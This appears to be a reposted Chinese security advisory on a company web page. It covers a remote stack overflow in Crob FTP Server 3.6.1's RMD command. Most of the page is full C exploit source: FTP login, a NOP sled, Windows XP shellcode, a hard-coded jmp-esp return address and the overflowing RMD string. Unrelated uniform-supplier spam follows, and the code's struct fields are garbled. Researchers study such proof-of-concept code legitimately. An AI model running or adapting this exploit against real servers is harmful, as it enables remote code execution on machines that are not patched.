锐码试验机
免费服务热线

Free service

hotline

锐码试验机
热门搜索:

资讯CrobFTPServer远程RMD命令栈溢出漏洞

发布时间:2019-04-03 17:34:39阅读:来源:锐码试验机
资讯CrobFTPServer远程RMD命令栈溢出漏洞

Crob FTP Server远程RMD命令栈溢出漏洞受影响系统: Crob Crob FTP Server 3.6.1描述: BUGTRAQID: 13847Crob Ftp Server是一款简单易用的FTP服务程序。Crob FTP Server在处理客户端请求时存在缓冲区溢出漏洞。如果攻击者能够向任意FTP命令(例如STOR)提供超长参数然后以很长的参数调用RMD命令的话,就可以触发栈溢出。成功利用这个漏洞的攻击者可在服务器上以执行代码。<*来源:Leon Juranic ([email protected])链接:测试方法: 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/** CrobFTP remote stack overflow PoC * ---------------------------------* Tested on Crob FTP Server 3.6.1, Windows XP* * Coded by Leon Juranic <[email protected]>* LSS Security / **/#include <stdio.h>#include <windows.h>#include <time.h>#pragma comment (lib,"ws2_32")char *fzz_recv (int sock){fd_set fds;struct timeval tv;static char buf[10000];char *ptr=buf;int n;_sec = 5;_usec = 0;FD_ZERO(&fds);FD_SET(sock,&fds);if (select(NULL,&fds,NULL,NULL,&tv) != 0) {if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);buf[n-1] = '\0';printf ("RECV: %s\n",buf);return buf;}else {return NULL;}}int login (int sock, char *user, char *pass){char buf[1024], *bla;bla=fzz_recv(sock);printf ("recv: %s\n",bla);sprintf (buf,"USER %s\r\n",user);send (sock,buf,strlen(buf),0);bla=fzz_recv(sock);printf ("recv: %s\n",bla);sprintf (buf,"PASS %s\r\n",pass);send (sock,buf,strlen(buf),0);bla=fzz_recv(sock);printf ("recv: %s\n",bla);if (strcmp("230",bla) != NULL)return 0;else return -1;return 0;}void lame_sploit (char *pack, char *user, char *pass){WORD wVersionRequested;WSADATA wsaData;int sock, err,x;struct sockaddr_in sin;char buf[2000],tmp[1000];char *shell=// 5 min. XP SP1 shellcode"\x33\xc0"// xor eax,eax"\x50"// push eax (\0)"\x68\x2e\x65\x78\x65"// push '.exe'"\x68\x63\x61\x6c\x63"// push 'calc'"\x54"// push esp"\xba\x44\x80\xc2\x77"// movedx, 77c28044"\xff\xd2";// call edx(system)wVersionRequested = MAKEWORD( 2, 2 );err = WSAStartup( wVersionRequested, &wsaData );if ( err != 0 ) {printf ("ERROR: Sorry, cannot create socket!!!\n");ExitProcess(-1);}sock=socket(AF_INET,SOCK_STREAM,0);n_family=AF_INET;n_addr.s_addr = inet_addr(pack);n_port = htons(21);if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {printf ("CONNECT :(((\n");ExitProcess(-1);}if (login(sock,user,pass) == -1){printf ("ERROR: Cannot login to FTP server, sorry!!!\n");exit(-1);}memset(tmp,0,sizeof(tmp));memset (tmp,0x90,180);memcpy (&tmp[80],shell,strlen(shell));*(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'*(long*)&tmp[166] = 0x74ec8390; //sub esp,0x74*(long*)&tmp[170] = 0x9090e4ff; //jmp esp_snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);printf ("DEBUG: %.30s %d\n",buf,strlen(buf));send (sock,buf,strlen(buf),0);printf ("%s\n",fzz_recv(sock));strcpy(buf,"RMD ");for (x=0;x<276;x++)strcat (buf,".../");strcat(buf,"\r\n");printf ("Sending exploit strings\n");send (sock,buf,strlen(buf),0);printf ("recv: %s\n",fzz_recv(sock));}main (int argc, char **argv){printf ("CrobFTP Stack overflow PoC \n""Coded by Leon Juranic <[email protected]>\n""LSS Security / ");if (argc < 4 ) {printf ("\nusage: %s <target_IP> <user> <pass>\n",argv[0]);exit(-1);}lame_sploit(argv[1],argv[2],argv[3]);}建议: 厂商补丁:Crob----目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

东莞地区厂服生产厂家

东莞地区劳保服照片

东莞职业装批发